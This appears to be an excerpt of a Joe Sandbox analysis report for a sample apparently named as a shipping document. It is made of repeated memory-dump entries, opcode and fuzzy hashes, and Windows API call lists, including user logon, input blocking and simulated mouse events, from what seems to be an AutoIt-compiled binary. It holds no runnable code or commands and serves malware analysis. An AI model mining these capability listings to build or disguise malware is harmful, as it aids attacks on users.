                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3192549508-0
                                                                                                                              • Opcode ID: 4be9ed23268be40550ed716458d95e169a4f247d8e789fd9da81a00483dd448f
                                                                                                                              • Instruction ID: 3342e2b437df919e0ca42f60253dc325be5519f3aa6af7355a6a53e9b14dbcbb
                                                                                                                              • Opcode Fuzzy Hash: 4be9ed23268be40550ed716458d95e169a4f247d8e789fd9da81a00483dd448f
                                                                                                                              • Instruction Fuzzy Hash: 04B09231464208AFCA006BD1EC09B8A3F68EB45AA2F404020F61D89060CB6254528A91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 037cc085b1ddebac83667bca16ac70253f5d5788bd42e356848a7d80ffa09d6f
                                                                                                                              • Instruction ID: e4e1bda112605ee28f0c2f1405f259213f6658018094fa8f214624667057246f
                                                                                                                              • Opcode Fuzzy Hash: 037cc085b1ddebac83667bca16ac70253f5d5788bd42e356848a7d80ffa09d6f
                                                                                                                              • Instruction Fuzzy Hash: 8832F42AD69F414DD7239634D83233AA24DEFB73D4F15D737E81AB5AA6EB29C4834100
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c8182948f65930765e9eb60c0d70736424ca3cfcc4061c34392b645f7d608cce
                                                                                                                              • Instruction ID: 5eefb727de7693967ccf53d3632bc81a0b2175b1bdd52134c2f677f7e4130471
                                                                                                                              • Opcode Fuzzy Hash: c8182948f65930765e9eb60c0d70736424ca3cfcc4061c34392b645f7d608cce
                                                                                                                              • Instruction Fuzzy Hash: 2CB10F28E6AF414DD2239A798831336BA5CAFFB2C5F51D71BFC2674D22FB2285834141
                                                                                                                              APIs
                                                                                                                              • __time64.LIBCMT ref: 00A18944
                                                                                                                                • Part of subcall function 009D537A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00A19017,00000000,?,?,?,?,00A191C8,00000000,?), ref: 009D5383
                                                                                                                                • Part of subcall function 009D537A: __aulldiv.LIBCMT ref: 009D53A3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2893107130-0
                                                                                                                              • Opcode ID: 3a1afb15d296e85cfefcbc461f9d3411bbdd3c551d7d0634226efcb997c08e55
                                                                                                                              • Instruction ID: f581944cfdfd0101bc05d57ab41cf4fe7029e5c95333ad6c553efca827b5d198
                                                                                                                              • Opcode Fuzzy Hash: 3a1afb15d296e85cfefcbc461f9d3411bbdd3c551d7d0634226efcb997c08e55
                                                                                                                              • Instruction Fuzzy Hash: D321B472635910CBC729CF65D841B92B3E1EFA5310B288E6CE1FACB2D0CA74B945DB54
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BlockInput
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3456056419-0
                                                                                                                              • Opcode ID: b3e999065f1174bacdf066f67bcd162a08a475403d17302ea22f2726420e8703
                                                                                                                              • Instruction ID: a2f509a96689838b6212bb8ebefad44c8688f75b7720e12722ef65b7504dc54b
                                                                                                                              • Opcode Fuzzy Hash: b3e999065f1174bacdf066f67bcd162a08a475403d17302ea22f2726420e8703
                                                                                                                              • Instruction Fuzzy Hash: B7E048312142145FC710DF5DE905A96FFE8AFA9760F008025FD49D7351DA74E9418B90
                                                                                                                              APIs
                                                                                                                              • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00A14D1D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: mouse_event
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2434400541-0
                                                                                                                              • Opcode ID: fc38bf613e377d5483a1089a34a9df9edd7a38a1d1254b00d8b03b571187a01b
                                                                                                                              • Instruction ID: 463c685bce3021e0c56b6b87e88112466ba2e48e41b005a32a9094c39a332069
                                                                                                                              • Opcode Fuzzy Hash: fc38bf613e377d5483a1089a34a9df9edd7a38a1d1254b00d8b03b571187a01b
                                                                                                                              • Instruction Fuzzy Hash: E2D09EB41646057DFC284B68BD2FBF61519F308B96FE845497602971C5A8E85CC1A435
                                                                                                                              APIs
                                                                                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00A086B1), ref: 00A08A93
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LogonUser
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1244722697-0
                                                                                                                              • Opcode ID: 296af1ffe6995b3728f6196d3cf0b52766568662262870bfc8de3964bf1b1248
                                                                                                                              • Instruction ID: 68520abe057499dd384be755fb59010ee109d5f0036ac16b4547b875929b8cc8
                                                                                                                              • Opcode Fuzzy Hash: 296af1ffe6995b3728f6196d3cf0b52766568662262870bfc8de3964bf1b1248
                                                                                                                              • Instruction Fuzzy Hash: 40D05E3226450EAFEF018EA8DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                                                                                              APIs
                                                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 009F2171
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: NameUser
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2645101109-0
                                                                                                                              • Opcode ID: 2cb4ba564ec61930612d735a259a614bfc4c72daf764480ca351c0601eb52210
                                                                                                                              • Instruction ID: 03799de1a4c4cf88d919420e7fd7db1bb47f9355726d252c760d0f0eb70d2138
                                                                                                                              • Opcode Fuzzy Hash: 2cb4ba564ec61930612d735a259a614bfc4c72daf764480ca351c0601eb52210
                                                                                                                              • Instruction Fuzzy Hash: 18C04CF181110DDBCB05DB90D988DFE77BCAB04305F104455A101F2100D7749B448B71
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 009DA2AA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3192549508-0
                                                                                                                              • Opcode ID: 7a113486c320d47c30a90f379ffbf774a111299e9f866eb0703d3f8d350a796c
                                                                                                                              • Instruction ID: 5a4ffc0e57a5153687b778e7698dd06d5191cc264199b1bd22e6822855d6f4bd
                                                                                                                              • Opcode Fuzzy Hash: 7a113486c320d47c30a90f379ffbf774a111299e9f866eb0703d3f8d350a796c
                                                                                                                              • Instruction Fuzzy Hash: 5AA0123001010CAB8A001B81EC044457F5CD6011907004020F40C45021873254114580
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: daa2c2b526cbae46c5ef68bdc2838e6abb203307c655b16a46ca913bc662bef6
                                                                                                                              • Instruction ID: de641b7885b6754f07eca25177996f74b129104a833fc2c5c04d7669d23151f1
                                                                                                                              • Opcode Fuzzy Hash: daa2c2b526cbae46c5ef68bdc2838e6abb203307c655b16a46ca913bc662bef6
                                                                                                                              • Instruction Fuzzy Hash: F6220170E0055A8BDF288B78D494B7FB7B5FB01304F68846EE8529B5E1DB359D81CB42
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                              • Instruction ID: 7aaf09b8d8895cf4cc2d7246dca957c60cdbdd31f1d9797f736323e74a2337ca
                                                                                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                              • Instruction Fuzzy Hash: A3C1943324519309DB2D473D853453EFEA59AB27B231A8B5FE8B2CB2D4EF14D524D620
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                              • Instruction ID: 1ecd132ad17f3542518d2181c7c81648ce7d34fd50dd9fb83f89b1a1988417bd
                                                                                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                              • Instruction Fuzzy Hash: E9C1743325519309DB2D473E853413EBFA59AA27B231A876FE4B2DB2D4EF14C524D620
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                              • Instruction ID: aa2f5f426164807e3b2eb00107e4fca86c0b2db225acb9887b573cc5e76cf4c2
                                                                                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                              • Instruction Fuzzy Hash: 98C1833329509319DB2D463D853413EBBA59AA27B231A875FE4B3CB2D4EF24C564D620
                                                                                                                              APIs
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00A27970
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00A27982
                                                                                                                              • DestroyWindow.USER32 ref: 00A27990
                                                                                                                              • GetDesktopWindow.USER32 ref: 00A279AA
                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00A279B1
                                                                                                                              • SetRect.USER32 ref: 00A27AF2
                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00A27B02
                                                                                                                              • CreateWindowExW.USER32 ref: 00A27B4A
                                                                                                                              • GetClientRect.USER32(00000000,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A27B56
                                                                                                                              • CreateWindowExW.USER32 ref: 00A27B90
                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00A27BB2
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A27BC5
                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A27BD0
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00A27BD9
                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000), ref: 00A27BE8
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00A27BF1
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A27BF8
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A27C03
                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000), ref: 00A27C15
                                                                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00A42CAC,00000000), ref: 00A27C2B
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A27C3B
                                                                                                                              • CopyImage.USER32 ref: 00A27C61
                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00A27C80
                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020), ref: 00A27CA2
                                                                                                                              • ShowWindow.USER32(00000004), ref: 00A27E8F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                              • API String ID: 2211948467-2373415609
                                                                                                                              • Opcode ID: a7e104afdef58372aa02bfd58e42fbd74c46c951f04cdff26130c6b4012cc6da
                                                                                                                              • Instruction ID: 2872bee11e48341ef641a4f391469618620773a5688db2f677863ad2d5645b4d
                                                                                                                              • Opcode Fuzzy Hash: a7e104afdef58372aa02bfd58e42fbd74c46c951f04cdff26130c6b4012cc6da
                                                                                                                              • Instruction Fuzzy Hash: D3027E71910215EFDB14DFA8DD89EAE7BB9FF49310F108169F909AB2A1C7709E41CB60
                                                                                                                              APIs
                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00A33690
                                                                                                                              • IsWindowVisible.USER32(?), ref: 00A336B4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharUpperVisibleWindow
                                                                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                              • API String ID: 4105515805-45149045
                                                                                                                              • Opcode ID: 30b7de9dcb6558bca0c8a00bfb8e407884c61a4b9e3759352f608aaf55329a94
                                                                                                                              • Instruction ID: 09f33bef441e1d9e899ced99b6e883d5d305c20f6d1bdee41cfa09db587bcfdc
                                                                                                                              • Opcode Fuzzy Hash: 30b7de9dcb6558bca0c8a00bfb8e407884c61a4b9e3759352f608aaf55329a94
                                                                                                                              • Instruction Fuzzy Hash: F0D171316187019BCF14EF20C991BAAB7A5AFD4394F548559F8C65B3E2CB31EE0ACB41
                                                                                                                              APIs
                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00A3A662
                                                                                                                              • GetSysColorBrush.USER32 ref: 00A3A693
                                                                                                                              • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,009EBABA,?,?), ref: 00A3A69F
                                                                                                                              • SetBkColor.GDI32(?,000000FF), ref: 00A3A6B9
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 00A3A6C8
                                                                                                                              • InflateRect.USER32 ref: 00A3A6F3
                                                                                                                              • GetSysColor.USER32(00000010,?,?,?,?,?,?,?,?,?,?,?,?,009EBABA,?,?), ref: 00A3A6FB
                                                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00A3A702
                                                                                                                              • FrameRect.USER32 ref: 00A3A711
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00A3A718
                                                                                                                              • InflateRect.USER32 ref: 00A3A763
                                                                                                                              • FillRect.USER32 ref: 00A3A795
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A3A7C0
                                                                                                                                • Part of subcall function 00A3A8FC: GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,00A3A62C,?,?,00000000,?), ref: 00A3A935
                                                                                                                                • Part of subcall function 00A3A8FC: SetTextColor.GDI32(?,?), ref: 00A3A939
                                                                                                                                • Part of subcall function 00A3A8FC: GetSysColorBrush.USER32 ref: 00A3A94F
                                                                                                                                • Part of subcall function 00A3A8FC: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,00A3A62C,?,?,00000000,?,?), ref: 00A3A95A
                                                                                                                                • Part of subcall function 00A3A8FC: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,00A3A62C,?,?,00000000,?,?), ref: 00A3A977
                                                                                                                                • Part of subcall function 00A3A8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A3A985
                                                                                                                                • Part of subcall function 00A3A8FC: SelectObject.GDI32(?,00000000), ref: 00A3A996
                                                                                                                                • Part of subcall function 00A3A8FC: SetBkColor.GDI32(?,00000000), ref: 00A3A99F
                                                                                                                                • Part of subcall function 00A3A8FC: SelectObject.GDI32(?,?), ref: 00A3A9AC
                                                                                                                                • Part of subcall function 00A3A8FC: InflateRect.USER32 ref: 00A3A9CB
                                                                                                                                • Part of subcall function 00A3A8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A3A9E2
                                                                                                                                • Part of subcall function 00A3A8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 00A3A9F7
                                                                                                                                • Part of subcall function 00A3A8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A3AA1F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
